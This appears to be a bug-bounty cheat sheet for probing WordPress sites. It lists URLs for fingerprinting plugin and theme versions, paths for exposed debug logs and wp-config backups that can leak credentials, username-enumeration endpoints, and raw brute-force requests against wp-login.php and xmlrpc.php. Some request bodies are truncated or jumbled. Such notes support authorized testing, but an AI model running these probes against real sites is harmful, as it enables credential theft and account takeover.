WordPress Common Bugs
Introduction
What would you do if you came across a website that uses WordPress?
How to Detect
If you visit https://target.com
and see the source code, you will see the links to themes and plugins from WordPress. Or you can visit https://target.com/wp-login.php
, it is the WordPress login admin page
- Find the related CVE by checking the core, plugins, and theme version
- How to find the wordpress version
1 2
https://target.com/feed https://target.com/?feed=rss2
- How to find the wordpress version
- How to find the plugin version
1 2 3 4
https://target.com/wp-content/plugins/PLUGINNAME/readme.txt https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT https://target.com/wp-content/plugins/PLUGINNAME/README.txt https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
or change readme.txt to changelog.txt or readme.md
- How to find the theme version
1 2
https://target.com/wp-content/themes/THEMENAME/style.css https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)
If you found outdated core / plugins / themes, find the exploit at https://wpscan.com
- Finding log files
1
http://target.com/wp-content/debug.log
- Finding backup file wp-config
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
http://target.com/.wp-config.php.swp http://target.com/wp-config.inc http://target.com/wp-config.old http://target.com/wp-config.txt http://target.com/wp-config.html http://target.com/wp-config.php.bak http://target.com/wp-config.php.dist http://target.com/wp-config.php.inc http://target.com/wp-config.php.old http://target.com/wp-config.php.save http://target.com/wp-config.php.swp http://target.com/wp-config.php.txt http://target.com/wp-config.php.zip http://target.com/wp-config.php.html http://target.com/wp-config.php~
- Get the username on the website
1
http://target.com/?author=1
or
1 2
http://target.com/wp-json/wp/v2/users http://target.com/?rest_route=/wp/v2/users
- Bruteforce ``` POST /wp-login.php HTTP/1.1 Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
1
or
POST /xmlrpc.php HTTP/1.1 Host: target.com
<?xml version=”1.0” encoding=”UTF-8”?>
1
2
6. XSPA in wordpress
POST /xmlrpc.php HTTP/1.1 Host: target.com
1
2
7. Register enabled
http://example.com/wp-login.php?action=register ```
Comments powered by Disqus.